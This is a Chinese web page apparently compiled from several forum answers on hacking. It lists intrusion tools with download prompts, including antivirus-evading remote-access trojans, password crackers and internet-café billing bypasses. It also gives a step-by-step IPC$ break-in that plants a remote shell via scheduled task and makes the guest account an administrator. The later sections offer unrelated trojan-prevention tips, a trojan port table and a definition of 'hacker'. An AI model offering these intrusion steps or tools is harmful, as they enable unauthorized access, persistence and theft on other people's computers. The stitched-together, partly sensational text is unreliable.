本文目录一览:
黑客常的伎俩有哪些?
常用很多dos命令的 taskkill taskkill /PID 1248 /t tasklist 查进程 cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限 iisreset /reboot tsshutdn /reboot /delay:1 重起服务器 logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户, query user 查看当前终端用户在线情况 要显示有关所有会话使用的进程的信息,请键入:query process * 要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2 要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2 要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02 命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启 命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统 命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。 命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机 一、扫描工具 X-scan 3.1 焦点出的扫描器,国内更优秀的安全扫描软件之一!非常专业的一个扫描器! 下载 X-way 2.5 这也上一个非常不错的扫描器哦!功能非常多!使用也不难,入侵必备工具! 下载 SuperScan 3.0 强大的TCP 端口扫描器、Ping 和域名解析器! 下载 Namp 3.5 这个就厉害了,安全界人人皆知的非常有名气的一个扫描器!作者Fyodor 下载 Hscan v1.20 这是款运行在Win NT/2000下的漏洞扫描工具,有GUI以及命令行两种扫描方式! 下载 SSS 俄罗斯安全界非常专业的一个安全漏洞扫描软件! 下载 U-Scan.exe 非常好的UNICODE漏洞扫描工具! 下载 RpcScan V1.1 可以通过135端口枚举远程主机RPC连接信息! 下载 SHED 1.01 一个用来扫描共享漏洞的机器的工具! 下载 DSScan V1.00 ms04-011远程缓冲区溢出漏洞扫描专用! 下载 Dotpot PortReady1.6 该软件为“绿色软件”,无需安装,非常小巧(仅23KB),具有极快的扫描速度! 下载 WebDAVScan v1.0 针对WEBDAV漏洞的扫描工具! 注意:该软件解压缩时会被查杀! 下载 Socks Proxy Finder2 扫描端口速度非常快的一个工具,扫描完毕后还可以导出保存起来! 下载 SQLScan v1.2 猜解开着1433端口的住机密码工具! 下载 RPC漏洞扫描器 v1.03 针对RPC漏洞扫描的工具! 下载 流光5.0 破解版 国内大名鼎鼎的黑客扫描工具,由高级程序员小榕编写! 下载 自动攻击探测机 Windows NT/2000 自动攻击探测机 下载 4899空口令探测 能够快速的扫描到被安装了radmin服务端4899端口的空口令IP! 下载 二、远程控制 黑洞2004 免杀版 藏鲸阁-陈经韬编写的著名远程控制程序!该版本还是8月15最新版的哦! 下载 冰河2004 免杀版 国内最有名,历史最悠久的木马冰河!本版本是冰河的最新版本,服务器端只有16KB! 下载 灰鸽子迷你版 灰鸽子工作室-葛军同志的作品! 下载 *** 神偷 5.7 *** 神偷是一个专业级的远程文件访问工具!具有反弹功能! 下载 广外女生 1.53 广州-广外女生小组的作品,曾风靡一时! 注意:该软件解压缩时会被查杀! 下载 Radmin3.2影子版 非常有名的监视程序!并非木马,所以服务端不会被查杀! 下载 黑社会 2.0 使用跟Radmin一样,功能明显比它多,扫描速度也非常快! 下载 风雪远程控制 v3.9 基于TCP/IP协议的远程管理 *** 工具,一个具有反弹功能的工具,非常小巧! 下载 无赖小子 2.5 无赖小子2.5,08月23日发布,其默认端口8011! 下载 蓝色火焰 v0.5 蓝色火焰是一个没有客户端的木马,可谓无招胜有招!注意:该软件解压缩时会被查杀! 下载 *** 公牛 国产公牛木马,由于上传文件大小限制,包中没有加入易语言运行库文件krnln.fnr! 下载 GoToMyPC 4.00 安装简单;能够从任何安装有浏览器的计算机 *** 问主机;具有新的安全功能! 下载 三、入侵必备 SQL综合利用工具 非常好的一个SQL连接器,除了可以输入CMD命令外,还可以直接上传软件! 下载 SuperSQLEXEC 用来连接sql server的工具! 下载 3389.exe 开远程机器3389端口的小东东!只要把程序上传到肉鸡运行后,重启既可! 下载 c3389.exe 是一个可以显示、更改本机或远程主机终端服务端口的小程序! 下载 3389.bat 一个开3389端口的批量处理! 下载 3399终端登陆器 用来远程登陆3389肉鸡终端的工具!这个win2000以上都有,以下的都没有! 下载 Opentelnet 远程开telnet的工具! 下载 NTLM.exe 去除ntlm验证的小工具,上传后执行,然后再telnet上去既可! 下载 Hide Admin V2.0 用来隐藏肉鸡上管理员帐号的工具!不过管理员帐号必须有$号哦! 下载 用的一个抓包工具,也是黑客经常使用的工具! 下载电脑-交换机-路由器 192.168.1.1~SSSO伴侣1.2 更直观的入侵,把dos下的入侵实战搬到图形界面上来! 下载 3389终端复制补丁 只要安装了该补丁,就可以直接把你需要上传的东西拖拽到肉鸡上!非常方便哦! 下载 TFTP32 非常使用的一个上传工具!也是大家经常使用的哦! 下载 Wget.exe 命令行下的http下载软件! 下载 Pulist.exe 使用pulist.exe 来获取已经登陆帐户的winlogon.exe 的PID 值! 下载 FindPass.exe 找管理员密码,需要PULIST配合! 下载 入侵助手1.0 该工具可以将dos下的入侵命令直接生成给黑客! 下载 Snake的 *** 跳板 让机器成为sock5 *** 软件的程序,可以用它隐藏自己的ip. 下载 Fport.exe 命令行下查看系统进程与端口关联! 四、注入工具 NBSI 2.0 NB联盟小竹编写的一个非常强悍sql注射工具! 下载 CASI 1.10 安全天使-superhei编写的一个php注射工具,亦是国内首发的之一个php注射工具! 下载 sqlasc.exe NB联盟出的注射点扫描工具! 下载 sql_injection 自贡学生联盟出的sql注射工具,跟臭要饭的哪个差不多! 下载 绝世猜解SQL注射 1.0 BUGKIDZ-臭要饭的!以前编写的sql注射工具,使用率相当广泛!简单实用的工具! 下载 五、网吧工具 还原转存大师 藏鲸阁出的还原转存大师,大家都认识!不做介绍! 下载 还原精灵清除器 CY07工作室出的一个还原精灵清除器!好久以前我用过,感觉非常不错! 下载 还原精灵密码读取 还原精灵密码读取!读取还原精灵密码的工具! 下载 还原卡密码破解程序 非常好用的还原卡密码破解程序! 下载 Pubwin4.3 修改程序 目的:跳过管理验证,并且可以免费上网! 下载 美萍9.0密码破解器1.0 美萍9.0密码破解器1.0!做破解使用! 下载 万象2R最新版破解器 万象2R最新版破解器!做破解使用! 下载 万象普及版密码破解器 可以显示退出密码;运行设置程序密码;注意:该软件解压缩时会被查杀! 下载 网吧管理集成破解器 网吧管理集成破解器,功能挺多的哦! 下载 Pubwin精灵 程序运行后,首先点击破解按钮,当显示破解成功后请点注销按钮.... 下载 小哨兵密码清除器 小哨兵密码清除,没有测试过,大家试试! 下载 解锁安全器2.0 解锁安全器2.0! 下载 硬盘还原卡破解程序 硬盘还原卡破解程序! 下载 还原卡解锁 还原卡解锁! 下载 Bios密码探测器 Bios密码探测器,速度很快的哦! 下载 共享密码扫描器 共享密码扫描器,也是一个不错的工具! 下载 硬盘还原卡工具包 硬盘还原卡工具包,零件很多,大家试试吧! 下载 干掉Windows2000 干掉Windows2000! 下载 注册表解锁器 注册表破解器!解锁用的! 下载 网上邻居密码破解器 网上邻居密码破解器,速度也很快哦! 下载 六、漏洞利用 动网7SP1,2,SQL注入 动网7SP1,7SP2,SQL版USER-AGENT注入利用程序!桂林老兵作品! 下载 动网上传利用程序 动网上传漏洞利用程序!桂林老兵作品! 下载 动网上传漏洞利用 动网上传漏洞利用程序,臭要饭的!作品! 下载 BBS3000漏洞利用工具 BBS3000漏洞利用工具,俺是奋青作品! 下载 尘缘雅境漏洞利用工具 尘缘雅境上传漏洞利用工具,俺是奋青作品! 下载 上传漏洞利用4in1 上传漏洞利用程序4合1! 下载 七、嗅探监听 nc.exe NC.EXE是一个非标准的telnet客户端程序!安全界有名的军刀! 下载 NetXray 一款非常好的 *** 分析和监控软件 下载 Sniffer Pro 4.7 想成为真正的黑客高手,那就先学会使用该工具吧! 下载 灰鸽子:;t=502fmt=- 阿D工具包: ;t=202fmt=- ssport扫描: NTscan: IP数据库纯真版:;downid=5id=36514 Recton V2.5 D贺专用版: 局域网查看工具: 站长助手公开版: 北斗4.1破解版: 木马彩衣715SVK: Private exe Protector:
跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有
一 相关命令
建立空连接:
net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)
建立非空连接:
net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)
映射默认共享:
net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)
如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$
删除一个ipc$连接
net use \\IP\ipc$ /del
删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del 删除全部,会有提示要求按y确认
提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射 *** 驱动器,效果一样.
二 经典入侵模式
1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以之一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
2. C:\copy srv.exe \\127.0.0.1\admin$
先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
3. C:\net time \\127.0.0.1
查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
4. C:\at \\127.0.0.1 11:05 srv.exe
用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)
5. C:\net time \\127.0.0.1
再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。
6. C:\telnet 127.0.0.1 99
这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了
7.C:\copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
8. C:\WINNT\system32ntlm
输入ntlm启动(这里的C:\WINNT\system32指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
9.Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)
为了以防万一,我们再把guest激活加到管理组
10. C:\net user guest /active:yes
将对方的Guest用户激活
11. C:\net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12. C:\net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).
ipc$经典入侵步骤:
1、net use \\ip\ipc$ 密码 /user:用户名
2、copy 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 时间 命令
5、入侵成功,连接你的肉鸡
常用的 *** 命令
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码
net localgroup administrators 用户名 /add 添加用户到管理组
net user 用户名 /delete 删除用户
net user 用户名 查看用户的基本情况
net user 用户名 /active:no 禁用该用户
net user 用户名 /active:yes 启用该用户
net share 查看计算机IPC$共享资源
net share 共享名 查看该共享的情况
net share 共享名=路径 设置共享。例如 net share c$=c:
net share 共享名 /delete 删除IPC$共享
net stop lanmanserver 关闭ipc$和默认共享依赖的服务
net use 查看IPC$连接情况
net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接
net use \\ip\ipc$ /del 删除一个连接
net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘
net use z: /del
net time \\ip 查看远程计算机上的时间
copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上
net view ip 查看计算机上的共享资源
at 查看自己计算机上的计划作业
at \\ip 查看远程计算机上的计划作业
at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业
at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业
at \\ip all /delete 删除远程计算机上的全部计划作业
at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt;
下面纯手打,上面是度娘给的
taskkill /im 进程名 停止运行
tasklisy 查看运行进程
ipconfig 查看本机IP
md 创建文件夹
rd 删除文件夹
echo off .txt|exit 添加文本
echo 内容 .txt 给文本添加内容
copy 复制文件
net user 用户名 密码/add 创建一个普通账号
net localgroup administrators 用户名 /add 把账户加入超级用户组
何谓黑客
什么是黑客?
他可以追溯到几十年前之一台分时小型电脑诞生, ARPAnet 实验也刚展开的年代,那时有一个由程序设计专家和 *** 名人所组成的, 具有分享特点的文化社群。这种文化的成员创造了 “hacker” 这个名词。黑客们建立了 Internet。黑客们发明出了现在使用的 UNIX 操作系统。黑客们使 Usenet 运作起来, 黑客们让 WWW 运转起来。如果你是这个文化的一部分,如果你对这种文化有所贡献,而且这个社群的其它成员也认识你并称你为 hacker, 那么你就是一位黑客。
黑客精神并不仅仅局限在软件的黑客文化中。有人用黑客态度对待其它事情,如电子学和音乐—— 事实上,你可以在任何更高级别的科学和艺术活动中发现它。精于软件的黑客赞赏这些在其他领域的同类并把他们也称作黑客—— 有人宣称黑客天性是绝对独立于他们工作的特定领域的。 但在这份文档中,我们将注意力集中在软件黑客的技术和态度,以及发明了“黑客”一词的以共享为特征的文化传统之上。
有一群人大声嚷嚷着自己是黑客,但他们不是。他们(主要是正值青春的少年)是一些蓄意破坏计算机和 *** 系统的人。真正的黑客把这些人叫做“骇客”(cracker),并不屑与之为伍。多数真正的黑客认为骇客们又懒又不负责任,还没什么大本事。专门以破坏别人安全为目的的行为并不能使你成为一名黑客, 正如用铁丝偷开走汽车并不能使你成为一个汽车工程师。不幸的是,很多记者和作家往往错把“骇客”当成黑客;这种做法一直使真正的黑客感到恼火。
根本的区别是:黑客搞建设,骇客搞破坏。
参考资料:;wd=%CA%B2%C3%B4%CA%C7%BA%DA%BF%CD
怎样预防木马
木马是一种基于远程控制的黑客工具,具有很强的隐蔽性和危害性。由于木马是在我们先运行了SERVER端(服务端),然后再启动GLIENT端(客户端或称控制端)进行控制。因此只要我们保持警惕,不让SERVER端有机会进入我们的电脑,也就不会被控制了,以下是我总结的防范特洛伊木马的二十条铁律:
以下六招是预防木马的常用招数:
1. 不要运行来历不明的软件,即使通过一般反病毒软件的检查也不要轻易运行。现在的反病毒软件把特洛伊木马定性为病毒,但还有相当数量的木马是这些软件所不能检查出来的,尤其是一些有一定编程技术的人自己编的后门程序。对于此类软件要用专门的黑客程序清除软件去检查。
2. 不要轻易相信别人。有些人别有用心,经常装作“大虾”善意地帮助人,给您发各种软件或图片,在您运行了这些软件后就后悔莫及了。这一点,对于热忠于网上聊天的MM们特别重要。
3. 下载软件要到有名的大站点,不要去野路子小站点。
4. 保持警惕性,对不熟悉的人发来的E-MAIL不要轻易打开,带有附件的就更要小心。另外,就算是熟人发来的E-MAIL,对其中的附件也要小心,您的朋友也许会无意中害了您(他的电脑被感染了木马,但他可能自己并不知道)。
5. 一定要给自己找个好点的实时监控反病毒软件,同时还要准备反黑软件,对下载的软件在运行前用它们进行检查。
6. 安装 *** 防火墙。这样即使中了木马,当有程序要连线上网时,防火墙会有所提示,就有可能发现木马。
以下三招是预防浏览网页中木马的招数:
7. 及时为系统安装补丁和疫苗。这样做可以减少浏览网页中木马的可能,会相对安全一点。
8. 运行IE,点击“工具--INTERNET选项--安全--INTERNET区域的安全级别”,把安全级别由“中”改为“高”。
9. 由于该类网页还有有害代码的ACTIVE X *** 文件,因此在IE设置中将ACTIVE X插件和控件、JAVA脚本等全部禁止就可以避免中招。具体 *** 是在IE窗口点击“工具--INTERNET选项--安全--自定义级别”会弹出“安全设置”对话框,把其中的所有ACTIVE
X插件和控件以及JAVA相关全部选择“禁用”即可。不过,这样做在以后的网页浏览过程中可能会造成一些正常使用ACTIVE
X的网站无法浏览。没办法,有利有弊嘛,自己看着办吧。
以下为检查特洛伊木马的 *** :
10. 注意检查注册表。如果觉得系统异常,请检查注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current
Version和HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version以及HKEY-USERS\Default\software\Microsoft\Windows\Current
Version下,所有以“Run”开头的键值名,看其下有没有可疑的文件名。如果有,就需要删除相应的键值,再删除相应的应用程序。
11. 注意检查启动组。木马们如果隐藏在启动组,虽然不是十分隐蔽,但这里的确是自动加载运行的好场所,因此还是有木马喜欢在这里驻留的。启动组对应的文件夹为:C:\windows\start
menu\programs\startup,在注册表中的位置:HKEY_CURRENT_USER\software\Microsoft\Windows\Current
Version\Explorer\Shell
12. 注意检查Win.ini。在Win.ini的字段中有启动命令“load=”和“run=”,在一般情况下“=”后面是空白的,如果有后跟程序,比方说是这个样子:run=c:\windows\n0tepad.exe,load=c:\windows\n0tepad.exe。要小心了,这个n0tepad.exe(注意在“n”后是数字“0”而非字母“o”)很可能是木马。
13. 注意检查System.ini。System.ini位于Windows的安装目录下,其字段的“shell=Explorer.exe”是木马喜欢的隐蔽加载之所,木马通常的做法是将该句变为:“shell=Explorer.exe
n0tepad.exe”,注意这里的n0tepad.exe就是木马服务端程序。
14. 注意检查Autoexec.bat和Config.sys。在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都需要控制端与服务端建立连接后,将已添加木马启动命令的同名文件上传到服务端覆盖这两个文件才行。
15. 注意检查C:\windows\winstart.bat文件。winstart.bat是一个特殊性毫不亚于Autoexec.bat的批处理文件,也是一个能自动被Windows加载运行的文件。它多数情况下为应用程序及Windows自动生成,在执行了Win.com并加载了多数驱动程序之后开始执行。由于Autoexec.bat的功能可以由winstart.ba代替完成,因此木马完全可以象在Autoexec.bat中那样被加载运行,危险由此而来。
16. 注意*.ini文件。Ini文件即应用程序的启动配置文件,控制端利用这些文件能启动程序的特点,将 *** 好的带有木马启动命令的同名文件上传到服务端,覆盖同名文件,这样就可以达到启动木马的目的了。
17. 注意系统中常用文件长度。木马如果捆绑在其中,长度就会发生变化,这是发现捆绑文件型木马的好办法。
18. 注意上网时电脑所用的端口,对1024端口以上的不连续端口要密切注意。可以键入:netstat
-a命令来观察你机器相连的当前所有通信端口,当有具体的IP正使用不常见的端口与你通信时,这一端口很可能就是特洛伊木马的连接端口。(在文后的附录中将罗列出一些有名的特洛伊木马的默认监听端口)
19. 注意检查进程。用查看进程软件来查看,如果发现有可疑进程,立刻看看其对应文件在硬盘中的哪个文件夹下,然后用反病毒、反黑软件进行检查。
20. 发现情况不对立即断线。尽管造成上网速度突然变慢的原因有很多,但有理由怀疑是由特洛伊木马造成的。
附录:(常见特洛伊木马的默认监听端口)
端口 特洛伊木马
21 Blade Runner,Doly Trojan,Fore,Invisible FTP,WebEx,Wincrash
23 Tiny Telnet Server
25 Antigen,Email Password Sender,Haebu Coceda,Shtrilitz
Stealth,Terminator,WinPC,Winspy
31 Hackers Paradise
80 Executor
456 HAckers Paradise
555 Ini-Killer,Phase Zero,Stealth Spy
666 Satanz Backdoor
1001 Silencer,WebEx
1011 Doly Trojan
1170 Psyber Stream Server,Voice
1234 Ultors Trojan
1245 VooDoo Doll
1492 FTP99CMP
1600 Shivka-Burka
1807 SpySender
1981 Shockrave
1999 BackDoor
2001 Trojan Cow
2023 Ripper
2115 Bugs
2140 Deep Throat,The Invasor
2801 Phineas Phucker
3024 WinCrash
3129 Masters Paradise
3150 Deep Throat,The Invasor
3700 Portal of Doom
4092 WinCrash
4590 ICQTrojan
5000 Sockets de Troie
5001 Sockets de Troie
5321 Firehotcker
5400 Blade Runner
5401 Blade Runner
5402 Blade Runner
5569 Robo-Hack
5742 WinCrash
6670 DeepThroat
6771 DeepThroat
6969 GAteCrasher,Priority
7000 Remote Grab
7300 NetMonitor
7301 NetMonitor
7306 NetMonitor
7307 NetMonitor
7308 NetMonitor
7789 ICKiller
9872 Portal of Doom
9873 Portal of Doom
9874 Portal of Doom
9875 Portal of Doom
9989 Ini-Killer
10067 Portal of Doom
10167 Portal of Doom
11000 Senna Spy
11223 Progenic Trojan
12223 Hack'99 KeyLogger
12345 GabanBus,NetBus
12346 GabanBus,NetBus
12361 Whack-a-mole
12362 Whack-a-mole
16969 Priority
20001 Millennium
20034 NetBus2 Pro
21544 GirlFriend
22222 Prosiak
23456 Evil FTP,Ugly FTP
26274 Delta
31337 Back Orifice
31338 Back Orifice
31339 NetSpy DK
31666 BOWhack
33333 Prosiak
34324 BigGluck,TN
40412 The Spy
40421 Masters Paradise
40422 Masters Paradise
40423 Masters Paradise
40426 Masters Paradise
47262 Delta
50505 Sockets de Troie
50766 Fore
53001 Romote Windows Shutdown
61466 Telecommando
65000 Devil
说明:以上所罗列出的端口一般为特洛伊木马的默认端口,而有些特洛伊木马可以随意更改端口,对于这种特洛伊木马,不能靠常规的思维去查找出痕迹,可以试着用专用的端口侦察器对1024至65535端口进行全面的搜索。
个人认为比较好的杀毒软件,金山毒霸,卡巴斯基,但是建议一句这东西不是万能的。。。
发现BA_钱包修改地址是怎么回事
黑客入侵。当用户因自己防范意识薄弱,而被黑客入侵手机时,黑客为了获得更多的利益,就会登录你的BAT钱包并修改你的地址,从而盗取你的钱财,致你家破人亡。